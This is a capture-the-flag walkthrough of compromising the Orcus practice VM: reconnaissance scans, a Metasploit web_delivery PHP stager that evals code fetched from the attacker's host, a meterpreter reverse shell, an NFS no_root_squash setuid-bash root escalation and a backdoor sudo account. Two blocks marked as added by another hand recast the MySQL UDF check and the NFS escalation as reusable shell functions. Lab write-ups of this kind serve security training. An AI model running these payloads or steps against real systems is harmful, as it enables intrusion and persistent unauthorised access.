CTF Orcus from Viper (hackfest 2016)

Hello guys, this is my third write-up of a vulnerable VM by @ViperBlackSkull. If you need more information you can reach me on Twitter at @marghost. You can get the virtual machine HERE. So let's get started.

This VM is tagged as hard, and it is! First I ran nmap:

[code language="bash"]root@kali:~# nmap -T4 -A -v 192.168.1.21
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-22 13:33 EDT
Discovered open port 443/tcp on 192.168.1.21
Discovered open port 143/tcp on 192.168.1.21
Discovered open port 139/tcp on 192.168.1.21
Discovered open port 995/tcp on 192.168.1.21
Discovered open port 22/tcp on 192.168.1.21
Discovered open port 993/tcp on 192.168.1.21
Discovered open port 445/tcp on 192.168.1.21
Discovered open port 80/tcp on 192.168.1.21
Discovered open port 111/tcp on 192.168.1.21
Discovered open port 53/tcp on 192.168.1.21
Discovered open port 110/tcp on 192.168.1.21
Discovered open port 2049/tcp on 192.168.1.21

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp   open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      40370/tcp  mountd
|   100005  1,2,3      54899/udp  mountd
|   100021  1,3,4      32978/tcp  nlockmgr
|   100021  1,3,4      55763/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
443/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 08:00:27:60:FE:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.4
Uptime guess: 0.048 days (since Wed Mar 22 12:24:55 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel[/code]

OK, so in summary: we have a web server, an RPC server with NFS (and maybe an accessible export), a Samba server, and two SSH servers (OpenSSH on port 22 and again on 443), which is odd.

The next step is to run nikto against the web server and see what is going on.

[code]root@kali:~# nikto -h 192.168.1.21
– Nikto v2.1.6
—————————————————————————
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2017-03-22 16:44:11 (GMT-4)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Entry ‘/exponent.js.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent.js2.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent_bootstrap.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent_constants.php’ in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry ‘/exponent_php_setup.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent_version.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/getswversion.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/login.php’ in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry ‘/overrides.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/selector.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/site_rss.php’ in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry ‘/source_selector.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/thumb.php’ in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry ‘/ABOUT.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/CHANGELOG.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/CREDITS.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/INSTALLATION.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/README.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/RELEASE.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/TODO.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry ‘/files/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry ‘/tmp/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the ‘..’ type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the ‘..’ type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting…
+ OSVDB-3092: /files/: This might be interesting…
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting…
+ OSVDB-3092: : This might be interesting… possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting… has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting…
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time:           2017-03-22 16:44:26 (GMT-4) (15 seconds)
—————————————————————————
+ 1 host(s) tested[/code]

So we have some kind of portal and phpMyAdmin installed. Let's look at robots.txt and the README/CHANGELOG/LICENSE files on the server.

robots.txt does not help. The README and LICENSE files tell us this is an install of Exponent CMS, and from the CHANGELOG we learn the version is 2.3.9.
A quick exploit search says it is vulnerable to SQL injection, but when I go to index.php and try a few payloads nothing works; the portal also displays a message saying the database is offline, so this is a dead end.
The phpMyAdmin default login does not work. I searched the other directories that nikto revealed and found nothing interesting.

Since the creator of the VM invites us to do extended enumeration, I will try some other information-gathering tools.

For enumeration's sake I will use enum4linux to see what I can get:

[code]root@kali:~# enum4linux -a -o -n -v 192.168.1.21
Target ……….. 192.168.1.21
RID Range …….. 500-550,1000-1050
Username ……… ”
Password ……… ”
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.21 |
====================================================
[V] Attempting to get domain name with command: nmblookup -A ‘192.168.1.21’
[+] Got domain/workgroup name: WORKGROUP

============================================
| Nbtstat Information for 192.168.1.21 |
============================================
Looking up status of 192.168.1.21
ORCUS <00> – B <ACTIVE> Workstation Service
ORCUS <03> – B <ACTIVE> Messenger Service
ORCUS <20> – B <ACTIVE> File Server Service
..__MSBROWSE__. <01> – <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> – <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> – B <ACTIVE> Master Browser
WORKGROUP <1e> – <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 192.168.1.21 |
=====================================
[V] Attempting to make null session using command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/ipc$ -U”%” -c ‘help’ 2>&1
[+] Server 192.168.1.21 allows sessions using username ”, password ”

===========================================
| Getting domain SID for 192.168.1.21 |
===========================================
[V] Attempting to get domain SID with command: rpcclient -W ‘WORKGROUP’ -U”%” 192.168.1.21 -c ‘lsaquery’ 2>&1
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup

======================================
| OS information on 192.168.1.21 |
======================================
[V] Attempting to get OS info with command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/ipc$ -U”%” -c ‘q’ 2>&1
[+] Got OS info for 192.168.1.21 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
[V] Attempting to get OS info with command: rpcclient -W ‘WORKGROUP’ -U”%” -c ‘srvinfo’ ‘192.168.1.21’ 2>&1
[+] Got OS info for 192.168.1.21 from srvinfo:
ORCUS Wk Sv PrQ Unx NT SNT Orcus server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03

=============================
| Users on 192.168.1.21 |
=============================
[V] Attempting to get userlist with command: rpcclient -W ‘WORKGROUP’ -c querydispinfo -U”%” ‘192.168.1.21’ 2>&1
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:

[V] Attempting to get userlist with command: rpcclient -W ‘WORKGROUP’ -c enumdomusers -U”%” ‘192.168.1.21’ 2>&1
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]

=========================================
| Share Enumeration on 192.168.1.21 |
=========================================
[V] Attempting to get share list using authentication
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Orcus server (Samba, Ubuntu))

Server Comment
——— ——-
ORCUS Orcus server (Samba, Ubuntu)

Workgroup Master
——— ——-
WORKGROUP ORCUS

[+] Attempting to map shares on 192.168.1.21
[V] Attempting map to share //192.168.1.21/print$ with command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/’print$’ -U”%” -c dir 2>&1
//192.168.1.21/print$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //192.168.1.21/IPC$ with command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/’IPC$’ -U”%” -c dir 2>&1
//192.168.1.21/IPC$ Mapping: OK Listing: DENIED

====================================================
| Password Policy Information for 192.168.1.21 |
====================================================
[V] Attempting to get Password Policy info with command: polenum ”:”@’192.168.1.21′ 2>&1
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[V] Attempting to get Password Policy info with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c "getdompwinfo" 2>&1

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.21 |
==============================
[V] Getting builtin groups with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘enumalsgroups builtin’ 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘enumalsgroups domain’ 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

=======================================================================
| Users on 192.168.1.21 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames administrator’ 2>&1
[V] Assuming that user "administrator" exists
[V] User "administrator" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames guest’ 2>&1
[V] Assuming that user "guest" exists
[V] User "guest" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames krbtgt’ 2>&1
[V] Assuming that user "krbtgt" exists
[V] User "krbtgt" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames domain admins’ 2>&1
[V] Assuming that user "domain admins" exists
[V] User "domain admins" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames root’ 2>&1
[V] Assuming that user "root" exists
[I] Found new SID: S-1-5-21-2160833340-863236869-394548843
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames bin’ 2>&1
[V] Assuming that user "bin" exists
[I] Found new SID: S-1-22-1
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames none’ 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c lsaenumsid 2>&1
[V] Processing SID S-1-5-32-550
[I] Found new SID: S-1-5-32
[V] Processing SID S-1-5-32-548
[V] Processing SID S-1-5-32-551
[V] Processing SID S-1-5-32-549
[V] Processing SID S-1-5-32-544
[V] Processing SID S-1-1-0
[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username ”, password ”
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2160833340-863236869-394548843 and logon username ”, password ”
S-1-5-21-2160833340-863236869-394548843-501 ORCUS\nobody (Local User)
S-1-5-21-2160833340-863236869-394548843-513 ORCUS\None (Domain Group)
S-1-5-21-2160833340-863236869-394548843-1000 ORCUS\viper (Local User)
S-1-5-21-2160833340-863236869-394548843-1001 ORCUS\root (Local User)[/code]

So we have anonymous (null session) access to Samba and RPC, and through those we find the users viper and root. We also found the user kippo when enumerating by SID. It looks like a manga name; I may investigate this later.

Dirb with the big dictionary is my next step:

[code]root@kali:~# dirb http://192.168.1.21 /usr/share/wordlists/dirb/big.txt

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Wed Mar 22 17:16:24 2017
URL_BASE: http://192.168.1.21/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

—————–

GENERATED WORDS: 20458

—- Scanning URL: http://192.168.1.21/ —-
==> DIRECTORY: http://192.168.1.21/FCKeditor/
+ http://192.168.1.21/LICENSE (CODE:200|SIZE:15437)
==> DIRECTORY: http://192.168.1.21/admin/
==> DIRECTORY: http://192.168.1.21/backups/
==> DIRECTORY: http://192.168.1.21/cron/
==> DIRECTORY: http://192.168.1.21/external/
==> DIRECTORY: http://192.168.1.21/files/
==> DIRECTORY: http://192.168.1.21/framework/
==> DIRECTORY: http://192.168.1.21/install/
==> DIRECTORY: http://192.168.1.21/javascript/
==> DIRECTORY: http://192.168.1.21/phpmyadmin/
+ http://192.168.1.21/robots.txt (CODE:200|SIZE:1347)
+ http://192.168.1.21/server-status (CODE:403|SIZE:300)
+ http://192.168.1.21/sitemap.xml (CODE:200|SIZE:113)
==> DIRECTORY: http://192.168.1.21/themes/
==> DIRECTORY: http://192.168.1.21/tmp/
+ http://192.168.1.21/webalizer (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.21/zenphoto/

—- Entering directory: http://192.168.1.21/FCKeditor/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
—- Entering directory: http://192.168.1.21/install/ —-
==> DIRECTORY: http://192.168.1.21/install/changes/
==> DIRECTORY: http://192.168.1.21/install/files/
==> DIRECTORY: http://192.168.1.21/install/images/
==> DIRECTORY: http://192.168.1.21/install/include/
==> DIRECTORY: http://192.168.1.21/install/pages/
==> DIRECTORY: http://192.168.1.21/install/popups/
==> DIRECTORY: http://192.168.1.21/install/samples/
==> DIRECTORY: http://192.168.1.21/install/upgrades/

—- Entering directory: http://192.168.1.21/javascript/ —-
==> DIRECTORY: http://192.168.1.21/javascript/jquery/

—- Entering directory: http://192.168.1.21/phpmyadmin/ —-

—- Entering directory: http://192.168.1.21/zenphoto/ —-
+ http://192.168.1.21/zenphoto/LICENSE (CODE:200|SIZE:18205)
==> DIRECTORY: http://192.168.1.21/zenphoto/albums/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache_html/
==> DIRECTORY: http://192.168.1.21/zenphoto/plugins/
+ http://192.168.1.21/zenphoto/robots.txt (CODE:200|SIZE:471)
==> DIRECTORY: http://192.168.1.21/zenphoto/themes/
==> DIRECTORY: http://192.168.1.21/zenphoto/uploaded/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-data/
—- Entering directory: http://192.168.1.21/zenphoto/zp-core/ —-
+ http://192.168.1.21/zenphoto/zp-core/dataaccess (CODE:200|SIZE:187)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/exif/
+ http://192.168.1.21/zenphoto/zp-core/htaccess (CODE:200|SIZE:546)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/images/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/js/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/locale/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/setup/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/utilities/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/watermarks/
DOWNLOADED: 1575266 – FOUND: 13[/code]

I cleaned the output up a little, and some interesting things were found. The zenphoto directory is an app that lets users upload images, interesting for a web_delivery attack. There is a backups directory that nikto did not find the first time, and some interesting things are there: SSH credentials that I cannot download for now, and a zipped file. Let's download it. It contains a db_conn.php file with:

[code]DEFINE (‘DB_USER’, ‘dbuser’);
DEFINE (‘DB_PASSWORD’, ‘dbpassword’);
DEFINE (‘DB_HOST’, ‘localhost’);
DEFINE (‘DB_NAME’, ‘quizdb’);[/code]

Next I will try to log into zenphoto. I went through the zenphoto setup and everything worked out fine: I could upload a PHP web_delivery stager and access it via the /zenphoto/albums/ directory.
This is how I set up the web_delivery exploit in Metasploit:

[code language="text"]use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
set uripath v9HL33yWdUR4KFo
run[/code]

Then I created a webdelivery.php file with this content (it fetches the stager from the Metasploit handler on port 8080 and evals it; the path must match the uripath set above):

[code language="php"]<?php
eval(file_get_contents('http://192.168.1.14:8080/v9HL33yWdUR4KFo'));
?>[/code]

Then I zipped it and uploaded it with zenphoto. It worked like a charm, and when I went to /zenphoto/albums/ I found my webdelivery.php file. Just open it and Metasploit will report a new session. Interact with it, drop to a shell, and spawn a proper bash with a pty:

[code language="text"]sessions -i 1[/code]

[code language="text"]python -c 'import pty; pty.spawn("/bin/bash")'[/code]

Now I have terminal access 😀

And BAM, the first flag!

[code][*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.21:58000) at 2017-03-22 23:56:38 -0400
sessions -i 1
[*] Starting interaction with 1…

meterpreter > shell
Process 5753 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Orcus:/var/www/html/zenphoto/albums/webdelivery-1$ cd /var/www
www-data@Orcus:/var/www$ ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4[/code]

Next I ran linuxprivchecker to search for an escalation path:

[code]wget http://www.securitysift.com/download/linuxprivchecker.py
chmod +x linuxprivchecker.py
python ./linuxprivchecker.py[/code]

It found that the MySQL server version is vulnerable, BUT secure_file_priv is set, so there is no chance to exploit it via raptor_udf2 with dbuser: that technique needs SELECT ... INTO DUMPFILE to write a shared object into the plugin directory, and secure_file_priv confines file writes to a single directory (or disables them entirely).
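The check behind that conclusion, as an added shell example that is not part of the original write-up: given the values of secure_file_priv and plugin_dir, decide whether SELECT ... INTO DUMPFILE could ever land a UDF library in the plugin directory. The rule is MySQL's documented one: NULL disables file reads and writes, an empty value imposes no restriction, and a directory restricts writes to that tree. The function names and the mysql_udf_check wrapper are mine; the wrapper assumes a local mysql client and the dbuser/dbpassword credentials from db_conn.php above (dbuser would additionally need the FILE privilege, which the script does not check).

```shell
#!/bin/sh
# Added example, not from the original post: can the raptor_udf2 route work
# against this MySQL server? The answer depends on secure_file_priv.

# udf_path_open SECURE_FILE_PRIV PLUGIN_DIR
#   exit 0 if SELECT ... INTO DUMPFILE may write into PLUGIN_DIR,
#   exit 1 if secure_file_priv forbids it.
#   NULL  -> file import/export statements disabled entirely
#   ""    -> no restriction
#   /dir  -> writes allowed only underneath /dir
udf_path_open() {
    spv=$1; plugdir=$2
    case "$spv" in
        NULL) return 1 ;;
        "")   return 0 ;;
    esac
    spv=${spv%/}; plugdir=${plugdir%/}
    # allowed only when plugin_dir lies inside the secure_file_priv tree
    case "$plugdir/" in
        "$spv"/*) return 0 ;;
        *)        return 1 ;;
    esac
}

# mysql_udf_check [USER] [PASSWORD]
#   live version of the check: queries both variables from the local server
#   (credentials default to the ones found in db_conn.php) and prints a verdict.
#   Returns udf_path_open's status, or 2 if the query itself failed.
mysql_udf_check() {
    user=${1:-dbuser}; pass=${2:-dbpassword}
    vals=$(mysql -N -u"$user" -p"$pass" \
           -e 'SELECT @@secure_file_priv, @@plugin_dir' 2>/dev/null) || return 2
    spv=$(printf '%s\n' "$vals" | cut -f1)
    plugdir=$(printf '%s\n' "$vals" | cut -f2)
    if udf_path_open "$spv" "$plugdir"; then
        echo "DUMPFILE into $plugdir allowed (secure_file_priv='$spv'): UDF route open"
    else
        echo "secure_file_priv='$spv' blocks writes to $plugdir: UDF route closed"
        return 1
    fi
}

# usage on the target, once you have a shell:  mysql_udf_check dbuser dbpassword
```

Ubuntu's packaged MySQL defaults secure_file_priv to /var/lib/mysql-files, which is exactly the closed case; the function also reports the open case (empty value, or a tree that contains plugin_dir) so the same check is reusable on other boxes.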

[code]git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git[/code]

Nothing to be found here either.

[code]git clone https://github.com/rebootuser/LinEnum.git
cd LinEnum
./LinEnum.sh[/code]

The first thing I saw was /home/.youwillfindnothinghere, and I thought MEH, maybe, but no:

[code]cd /home/.youwillfindnothinghere
www-data@Orcus:/home/.youwillfindnothinghere$ ls
ls
itoldyou
www-data@Orcus:/home/.youwillfindnothinghere$ cat itoldyou
cat itoldyou[/code]

PFFFF

But LinEnum found something useful:

[code]NFS config details:
-rw-r--r-- 1 root root 415 Oct 18 19:56 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)[/code]

OH yeah, no_root_squash. Normally the NFS server maps the client's root (uid 0) to nobody (root_squash); with no_root_squash a file written by root on my Kali box stays owned by root on the target. Since the export is also rw and open to every host (*), I can plant a root-owned setuid binary in the target's /tmp and use it to escalate privileges!

First, on Kali you need to install nfs-common (wtf Kali), then check the export list:

[code]showmount -e 192.168.1.21
Export list for 192.168.1.21:
/tmp *[/code]

As expected. Mount it locally:

[code]mount -t nfs 192.168.1.21:/tmp /tmpvictim -o nolock[/code]

Inside the victim shell:

[code]cp /bin/bash /tmp/bash[/code]

From Kali, as root, on the mounted share (the copy is created by uid 0 and, thanks to no_root_squash, is owned by root on the target; 4777 sets the setuid bit):

[code]cp /tmpvictim/bash /tmpvictim/vulnbash

chmod 4777 /tmpvictim/vulnbash[/code]

Back in the victim shell, just execute it with -p so bash keeps the setuid effective uid instead of dropping it:

[code]/tmp/vulnbash -p[/code]
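The whole no_root_squash escalation above, wrapped up as an added shell example that is not part of the original post, together with the two checks worth running around it: triaging an exports list for the dangerous combination (any host, rw, no_root_squash) before bothering to mount, and confirming the planted binary really is setuid and root-owned before running it. risky_exports and setuid_root_line work offline on text; plant_setuid_bash does the real mount and is meant to be run by hand as root on the attacking box with nfs-common installed, after the victim shell has done cp /bin/bash /tmp/bash. All function names and the sample exports content are mine.

```shell
#!/bin/sh
# Added example, not from the original post: NFS no_root_squash privilege
# escalation as reusable shell, plus the pre- and post-checks.

# risky_exports < /etc/exports
#   print every export that any client can write to without root being
#   squashed. Understands exports(5) syntax "path host(opts) host(opts)".
risky_exports() {
    awk '
        { sub(/#.*/, "") }      # drop comments; assigning $0 recomputes NF
        NF < 2 { next }         # no client spec means nothing is exported
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                spec = $i; host = spec; opts = ""
                p = index(spec, "(")
                if (p > 0) {
                    host = substr(spec, 1, p - 1)
                    opts = substr(spec, p + 1)
                    sub(/\)$/, "", opts)
                }
                o = "," opts ","
                # root_squash is the default, so no_root_squash must be explicit;
                # "*" (or an empty host) opens the export to every client
                if ((host == "*" || host == "") && index(o, ",rw,") > 0 && index(o, ",no_root_squash,") > 0)
                    print path " " spec
            }
        }'
}

# setuid_root_line "<one line of ls -l output>"
#   exit 0 when the entry is setuid (lowercase s in the owner execute slot)
#   and owned by root, which is what the victim should see for /tmp/vulnbash.
setuid_root_line() {
    set -- $1
    mode=$1; owner=$3
    case "$mode" in
        -??s*) [ "$owner" = root ] && return 0 ;;
    esac
    return 1
}

# plant_setuid_bash TARGET [MOUNTPOINT]
#   attacker-side steps, run as root. With no_root_squash the client's uid 0 is
#   kept on the server, so the copy is root-owned there and chmod 4777 makes it
#   setuid root. On the victim, "/tmp/vulnbash -p" then gives euid 0 (-p stops
#   bash from dropping the setuid privilege).
plant_setuid_bash() {
    target=$1; mnt=${2:-/tmpvictim}
    mkdir -p "$mnt"
    mount -t nfs -o nolock "$target:/tmp" "$mnt" || return 1
    cp "$mnt/bash" "$mnt/vulnbash" || return 1
    chmod 4777 "$mnt/vulnbash"
    # verify before telling the victim side to run it
    setuid_root_line "$(ls -ld "$mnt/vulnbash")"
}

# usage:  risky_exports < /etc/exports       (on the victim, or on a copy)
#         plant_setuid_bash 192.168.1.21      (on Kali, as root)
```

risky_exports only flags exports open to every host; an export restricted to a subnet with the same options is just as dangerous from inside that subnet, so read the full list too rather than relying on the filter alone.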

Yes sir, we got root, but to make it more stable I will create a user and log in over SSH:

[code]openssl passwd -crypt test
SSybfm7a0XqFo
useradd -p SSybfm7a0XqFo -s /bin/bash -g 0 groot
usermod -aG sudo groot[/code]

[code]root@kali:/tmpvictim# ssh [email protected]
groot@Orcus:/$ id
uid=1007(groot) gid=0(root) groups=0(root),27(sudo)
groot@Orcus:/$ sudo su
sudo: unable to resolve host Orcus
root@Orcus:/# id
